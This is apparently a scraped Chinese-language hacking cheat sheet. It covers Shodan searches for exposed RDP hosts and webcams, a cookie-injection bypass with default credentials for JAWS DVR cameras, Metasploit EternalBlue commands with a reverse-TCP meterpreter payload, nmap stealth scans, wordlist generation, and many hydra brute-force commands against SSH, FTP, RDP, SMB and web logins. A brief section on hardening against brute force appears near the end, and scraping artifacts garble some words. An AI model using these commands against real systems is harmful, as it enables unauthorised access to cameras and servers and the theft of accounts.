kali更新MFS

1. 更换yum源地址 2. 添加kali数字签名 3. 如果出现无法更新建议卸载MFS之后在安装 4. sudo rm 对锁强制解锁进行安装 5. 启动数据库 postgresql 设置开机自动启动 

撒旦之眼

https://www.shodan.io/

在输入框输入 prot:3389 os:windows

摄像头

JAWS/1.1

输入

讯享网document.cookie="dvr_camcnt=4"; document.cookie="dvr_usr=admin"; document.cookie="dvr_pwd=123"; 

在url 后面加上 10.1.1.1:8080//view2.html

摄像头2

海康威视

admin

大华网络摄像机

admin

天地伟业

Admin

Hikvision

Server:DVRDVS-Webs

msfconsole 工具开启 (永恒之蓝)

1.开启命令

讯享网

msfconsole search ms17-010 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp set RHOSTS *(目标ip) set LHOST (本地ip) 

nmap

讯享网nmap -sP ip地址 /24 不指定端口 -p 指定端口 -p-全端口 -sT TCP全连接扫描 会留下记录 扫描方法：nmap扫描类型主要有TCP的全连接扫描（会在被扫描机器留下记录），半连接扫描（不会留下记录），FIN扫描（可以判断对方操作系统的类型）。 -sS TCP半连接扫描 -sN 隐蔽扫描 -sX 隐蔽扫描 -sF 隐蔽扫描 -O 对方系统类型 （不太准确） -oN/oX txt/xml 

字典生成工具 crunch

参数详解 min 设定最小字符串长度（必选） max 设定最大字符串长度（必选） oprions -b 指定文件输出的大小，避免字典文件过大 -c 指定文件输出的行数，即包含密码的个数 -d 限制相同元素出现的次数 -e 定义停止字符，即到该字符串就停止生成 -f 调用库文件（/etc/share/crunch/charset.lst） -i 改变输出格式，即aaa,aab -> aaa,baa -I 通常与-t联合使用，表明该字符为实义字符 -m 通常与-p搭配 -o 将密码保存到指定文件 -p 指定元素以组合的方式进行 -q 读取密码文件，即读取pass.txt -r 定义重某一字符串重新开始 -s 指定一个开始的字符，即从自己定义的密码xxxx开始 -t 指定密码输出的格式 -u 禁止打印百分比（必须为最后一个选项） -z 压缩生成的字典文件，支持gzip,bzip2,lzma,7z 

CUPP

讯享网CUPP是一个非常强大的工具，专门为一个人创建一个词汇表。CUPP是跨平台的，用Python编写。CUPP向您询问有关目标（姓名，妻子姓名，宠物名称......）的问题，然后根据您输入的关键字创建一个密码。 

hydra (九头蛇 在线激活成功教程工具)

一、简介
hydra是著名黑客组织thc的一款开源的暴力密码激活成功教程工具，可以在线激活成功教程多种密码。
官 网：http://www.thc.org/thc-hydra。

可支持AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL , NCP, NNTP, Oracle Listener , Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP等类型密码。

二、安装
Hydra 安装

# wget --no-check-certificate https://www.thc.org/releases/hydra-8.1.tar.gz # tar zxvf hydra-8.1.tar.gz # cd hydra-8.1 # ./configure # make && make install 三、参数说明 hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT] -R 继续从上一次进度接着激活成功教程。 -S 采用SSL链接。 -s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定激活成功教程的用户，对特定用户激活成功教程。 -L FILE 指定用户名字典。 -p PASS 小写，指定密码激活成功教程，少用，一般是采用密码字典。 -P FILE 大写，指定密码字典。 -e ns 可选选项，n：空密码试探，s：使用指定用户和密码试探。 -C FILE 使用冒号分割格式，例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后，找到第一对登录名或者密码的时候中止激活成功教程。 -t TASKS 同时运行的线程数，默认为16。 -w TIME 设置最大超时的时间，单位秒，默认是30s。 -v / -V 显示详细过程。 server 目标ip service 指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。 OPT 可选项 

四、各种用法实例 ：

讯享网1、激活成功教程ssh： hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip ssh hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh 2、激活成功教程ftp： hydra ip ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV 3、get方式提交，激活成功教程web登录： hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php 4、post方式提交，激活成功教程web登录： hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password" hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form "login.php:id=^USER^&passwd=^PASS^:<title>wrong username or password</title>" （参数说明：-t同时线程数3，-l用户名是admin，字典pass.txt，保存为out.txt，-f 当激活成功教程了一个密码就停止， 10.36.16.18目标ip，http-post-form表示激活成功教程是采用http的post方式提交的表单密码激活成功教程,<title>中 的内容是表示错误猜解的返回信息提示。） 5、激活成功教程https： hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 6、激活成功教程teamspeak： hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 7、激活成功教程cisco： hydra -P pass.txt 10.36.16.18 cisco hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 8、激活成功教程smb： hydra -l administrator -P pass.txt 10.36.16.18 smb 9、激活成功教程pop3： hydra -l muts -P pass.txt my.pop3.mail pop3 10、激活成功教程rdp： hydra ip rdp -l administrator -P pass.txt -V 11、激活成功教程http-proxy： hydra -l admin -P pass.txt http-proxy://10.36.16.18 12、激活成功教程imap： hydra -L user.txt -p secret 10.36.16.18 imap PLAIN hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN 

theHarvester 邮箱搜集

黑帽大牛网站 http://caidaome.com/?sort=5

SQL 注入

服务器提权 mof | udf 提权

sql注入分类

注入手法

1 联合查询注入
2 报错型注入
3 布尔型注入
4 基于时间延迟注入
5 可多语句查询注入

渗透软件

DirBuster

 DirBuster是Owasp(Open Web APPlication Security Project )开发的一款专门用于探测网站目录和文件(包括隐藏文件)的工具。由于使用java编写，电脑中要装有JDK才能运行 

御剑

github地址 https://github.com/foryujian/yjdirscan

火狐工具 wappalyzer

Wappalyzer是一款能够分析目标网站所采用的平台构架、网站环境、服务器配置环境、JavaScript框架、编程语言等参数的chrome网站技术分析插件。

渗透环境搭建模型 dvwa

图片木马制作

edjpgcom 图片木马

web扫描软件

AppScan

BurpSuite

arachni

防御暴力激活成功教程

讯享网1.useradd yangge -s /sbin/nologin 2.秘密复杂性 大小写+数字+特殊符号+20为以上+定期更换 3修改默认端口 4.限制登陆的用户组或者数据 5.使用sudo 6.基于PAM 实现登陆限制 auth required pam_tally2.so deny=2 even_deny_root root_unlock_time=60 unlock_time=6 

指纹识别工具

国外指纹识别工具 whatweb

获取网站信息插件 Web Developer